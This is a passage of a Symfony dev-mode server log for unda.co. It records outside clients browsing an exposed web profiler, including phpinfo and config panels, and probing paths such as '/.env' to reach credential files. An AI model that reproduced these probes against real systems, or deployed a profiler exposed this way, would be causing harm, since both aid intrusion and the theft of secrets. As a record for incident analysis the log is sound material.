  4977. [2025-12-19 06:23:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4978. [2025-12-19 06:27:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4979. [2025-12-19 06:32:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4980. [2025-12-19 06:34:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=request","method":"GET"} []
  4981. [2025-12-19 06:34:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4982. [2025-12-19 06:42:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
  4983. [2025-12-19 06:42:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  4984. [2025-12-19 06:46:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c","method":"GET"} []
  4985. [2025-12-19 06:46:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4986. [2025-12-19 06:46:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.69.166&limit=10&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  4987. [2025-12-19 06:46:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.69.166&limit=10&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  4988. [2025-12-19 06:46:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4cfca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4cfca9?panel=time","method":"GET"} []
  4989. [2025-12-19 06:46:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4990. [2025-12-19 06:49:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4991. [2025-12-19 06:57:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=twig","method":"GET"} []
  4992. [2025-12-19 06:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4993. [2025-12-19 06:58:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4994. [2025-12-19 07:01:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4995. [2025-12-19 07:01:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  4996. [2025-12-19 07:07:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"674ce7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/674ce7?panel=router","method":"GET"} []
  4997. [2025-12-19 07:07:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4998. [2025-12-19 07:09:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
  4999. [2025-12-19 07:09:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
  5000. [2025-12-19 07:11:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=time","method":"GET"} []
  5001. [2025-12-19 07:11:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5002. [2025-12-19 07:22:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=security","method":"GET"} []
  5003. [2025-12-19 07:22:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5004. [2025-12-19 07:23:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5005. [2025-12-19 07:23:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5006. [2025-12-19 07:24:16] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"4e9618","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/4e9618","method":"GET"} []
  5007. [2025-12-19 07:24:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5008. [2025-12-19 07:24:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5009. [2025-12-19 07:29:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"HEAD"} []
  5010. [2025-12-19 07:31:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4210bf","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4210bf?panel=config","method":"GET"} []
  5011. [2025-12-19 07:31:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5012. [2025-12-19 07:32:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=twig","method":"GET"} []
  5013. [2025-12-19 07:32:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5014. [2025-12-19 07:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
  5015. [2025-12-19 07:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5016. [2025-12-19 07:33:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=request","method":"GET"} []
  5017. [2025-12-19 07:33:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5018. [2025-12-19 07:33:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5019. [2025-12-19 07:38:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c4e99c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c4e99c","method":"GET"} []
  5020. [2025-12-19 07:38:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5021. [2025-12-19 07:39:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  5022. [2025-12-19 07:40:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e0bba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e0bba?panel=config","method":"GET"} []
  5023. [2025-12-19 07:40:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5024. [2025-12-19 07:40:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5025. [2025-12-19 07:42:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=config","method":"GET"} []
  5026. [2025-12-19 07:42:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5027. [2025-12-19 07:42:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5028. [2025-12-19 07:44:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=dump","method":"GET"} []
  5029. [2025-12-19 07:44:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5030. [2025-12-19 07:47:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5031. [2025-12-19 07:51:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca?panel=cache","method":"GET"} []
  5032. [2025-12-19 07:51:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5033. [2025-12-19 07:56:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5034. [2025-12-19 08:00:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=time","method":"GET"} []
  5035. [2025-12-19 08:00:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5036. [2025-12-19 08:01:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=dump","method":"GET"} []
  5037. [2025-12-19 08:01:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5038. [2025-12-19 08:01:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=security","method":"GET"} []
  5039. [2025-12-19 08:01:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5040. [2025-12-19 08:03:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
  5041. [2025-12-19 08:03:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5042. [2025-12-19 08:05:31] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  5043. [2025-12-19 08:05:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5044. [2025-12-19 08:05:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5045. [2025-12-19 08:05:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5046. [2025-12-19 08:05:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5047. [2025-12-19 08:05:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5048. [2025-12-19 08:05:31] security.DEBUG: Calling Authentication entry point. [] []
  5049. [2025-12-19 08:05:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  5050. [2025-12-19 08:05:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5051. [2025-12-19 08:05:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5052. [2025-12-19 08:05:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5053. [2025-12-19 08:05:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5054. [2025-12-19 08:05:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5055. [2025-12-19 08:05:32] security.DEBUG: Calling Authentication entry point. [] []
  5056. [2025-12-19 08:05:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  5057. [2025-12-19 08:05:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5058. [2025-12-19 08:05:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5059. [2025-12-19 08:05:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5060. [2025-12-19 08:05:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5061. [2025-12-19 08:05:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5062. [2025-12-19 08:05:33] security.DEBUG: Calling Authentication entry point. [] []
  5063. [2025-12-19 08:08:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  5064. [2025-12-19 08:08:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  5065. [2025-12-19 08:10:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d55aca","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d55aca","method":"GET"} []
  5066. [2025-12-19 08:10:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5067. [2025-12-19 08:13:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5068. [2025-12-19 08:13:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5069. [2025-12-19 08:15:24] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  5070. [2025-12-19 08:15:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5071. [2025-12-19 08:15:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5072. [2025-12-19 08:15:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5073. [2025-12-19 08:15:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5074. [2025-12-19 08:15:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5075. [2025-12-19 08:15:24] security.DEBUG: Calling Authentication entry point. [] []
  5076. [2025-12-19 08:15:24] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  5077. [2025-12-19 08:18:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5078. [2025-12-19 08:19:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c61e5e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c61e5e?panel=request","method":"GET"} []
  5079. [2025-12-19 08:19:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5080. [2025-12-19 08:19:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2","method":"GET"} []
  5081. [2025-12-19 08:19:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  5082. [2025-12-19 08:20:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f0043c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f0043c?panel=request","method":"GET"} []
  5083. [2025-12-19 08:20:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5084. [2025-12-19 08:21:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  5085. [2025-12-19 08:22:52] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  5086. [2025-12-19 08:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5087. [2025-12-19 08:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5088. [2025-12-19 08:22:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5089. [2025-12-19 08:22:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5090. [2025-12-19 08:22:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5091. [2025-12-19 08:22:52] security.DEBUG: Calling Authentication entry point. [] []
  5092. [2025-12-19 08:22:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  5093. [2025-12-19 08:22:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5094. [2025-12-19 08:22:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5095. [2025-12-19 08:22:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5096. [2025-12-19 08:22:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
